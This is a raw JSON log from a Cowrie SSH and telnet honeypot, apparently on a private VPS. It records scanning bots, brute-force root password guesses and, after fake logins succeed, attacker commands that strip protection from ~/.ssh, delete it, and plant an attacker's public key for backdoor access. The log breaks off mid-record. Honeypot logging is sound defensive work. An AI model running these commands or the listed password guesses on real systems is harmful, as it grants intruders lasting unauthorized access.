{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T00:35:26.937325Z","src_ip":"196.251.85.101","session":"5159448d10c4"}
{"eventid":"cowrie.session.closed","duration":12.800448179244995,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:27.859855Z","src_ip":"212.227.125.160","session":"b123acd697b2"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:35:27.861142Z","src_ip":"196.251.85.101","session":"5159448d10c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44768,"dst_ip":"1.2.3.4","dst_port":23,"session":"975e6d268aed","protocol":"telnet","message":"New connection: 212.227.125.160:44768 (1.2.3.4:23) [session: 975e6d268aed]","sensor":"my-vps","timestamp":"2025-08-26T00:35:28.033388Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:29.377842Z","src_ip":"196.251.85.101","session":"5159448d10c4"}
{"eventid":"cowrie.session.closed","duration":12.770490646362305,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:40.803812Z","src_ip":"212.227.125.160","session":"975e6d268aed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45096,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcf95ddcedb5","protocol":"telnet","message":"New connection: 212.227.125.160:45096 (1.2.3.4:23) [session: dcf95ddcedb5]","sensor":"my-vps","timestamp":"2025-08-26T00:35:40.979559Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":33434,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ed1efa068d6","protocol":"ssh","message":"New connection: 27.112.78.245:33434 (1.2.3.4:22) [session: 1ed1efa068d6]","sensor":"my-vps","timestamp":"2025-08-26T00:35:49.510605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:35:49.511550Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:35:49.783301Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.login.success","username":"root","password":"cde3@WSXzaq1","message":"login attempt [root/cde3@WSXzaq1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:35:50.869459Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:35:51.455078Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:35:51.455751Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:35:51.456675Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:51.717737Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:35:52.309268Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:35:52.309977Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:35:52.572091Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:52.572923Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":33448,"dst_ip":"1.2.3.4","dst_port":22,"session":"097191861747","protocol":"ssh","message":"New connection: 27.112.78.245:33448 (1.2.3.4:22) [session: 097191861747]","sensor":"my-vps","timestamp":"2025-08-26T00:35:52.839271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:35:52.840069Z","src_ip":"27.112.78.245","session":"097191861747"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:35:53.110073Z","src_ip":"27.112.78.245","session":"097191861747"}
{"eventid":"cowrie.session.closed","duration":12.841437101364136,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:53.820934Z","src_ip":"212.227.125.160","session":"dcf95ddcedb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45436,"dst_ip":"1.2.3.4","dst_port":23,"session":"da30ca84757b","protocol":"telnet","message":"New connection: 212.227.125.160:45436 (1.2.3.4:23) [session: da30ca84757b]","sensor":"my-vps","timestamp":"2025-08-26T00:35:54.032101Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:35:54.228849Z","src_ip":"27.112.78.245","session":"097191861747"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:55.506061Z","src_ip":"27.112.78.245","session":"097191861747"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44782,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fa387807cf6","protocol":"ssh","message":"New connection: 27.112.78.245:44782 (1.2.3.4:22) [session: 0fa387807cf6]","sensor":"my-vps","timestamp":"2025-08-26T00:35:55.778989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:35:55.779860Z","src_ip":"27.112.78.245","session":"0fa387807cf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:35:56.053764Z","src_ip":"27.112.78.245","session":"0fa387807cf6"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":44008,"dst_ip":"1.2.3.4","dst_port":22,"session":"14b695d2f225","protocol":"ssh","message":"New connection: 45.159.112.103:44008 (1.2.3.4:22) [session: 14b695d2f225]","sensor":"my-vps","timestamp":"2025-08-26T00:35:56.812066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:35:56.812800Z","src_ip":"45.159.112.103","session":"14b695d2f225"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:35:56.922861Z","src_ip":"45.159.112.103","session":"14b695d2f225"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:35:57.192746Z","src_ip":"27.112.78.245","session":"0fa387807cf6"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwertyuiop","message":"login attempt [postgres/qwertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-26T00:35:57.407547Z","src_ip":"45.159.112.103","session":"14b695d2f225"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:57.489743Z","src_ip":"27.112.78.245","session":"1ed1efa068d6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:57.491903Z","src_ip":"27.112.78.245","session":"0fa387807cf6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:35:58.519542Z","src_ip":"45.159.112.103","session":"14b695d2f225"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":56882,"dst_ip":"1.2.3.4","dst_port":22,"session":"107feb43eb4d","protocol":"ssh","message":"New connection: 24.108.102.132:56882 (1.2.3.4:22) [session: 107feb43eb4d]","sensor":"my-vps","timestamp":"2025-08-26T00:36:02.381652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:36:02.392470Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:36:02.560205Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55624,"dst_ip":"1.2.3.4","dst_port":22,"session":"19690eb39a0a","protocol":"ssh","message":"New connection: 217.72.205.35:55624 (1.2.3.4:22) [session: 19690eb39a0a]","sensor":"my-vps","timestamp":"2025-08-26T00:36:02.808935Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:02.810011Z","src_ip":"217.72.205.35","session":"19690eb39a0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Hy!123456","message":"login attempt [root/Hy!123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:36:03.224904Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:36:03.580000Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:36:03.580704Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:36:03.581586Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:03.750162Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:36:04.200737Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.201437Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":40586,"dst_ip":"1.2.3.4","dst_port":22,"session":"bce0afb0bb32","protocol":"ssh","message":"New connection: 45.88.8.186:40586 (1.2.3.4:22) [session: bce0afb0bb32]","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.342311Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.375950Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.376787Z","src_ip":"24.108.102.132","session":"107feb43eb4d"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":56890,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4b27e2ab280","protocol":"ssh","message":"New connection: 24.108.102.132:56890 (1.2.3.4:22) [session: b4b27e2ab280]","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.521406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:36:04.532185Z","src_ip":"24.108.102.132","session":"b4b27e2ab280"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly130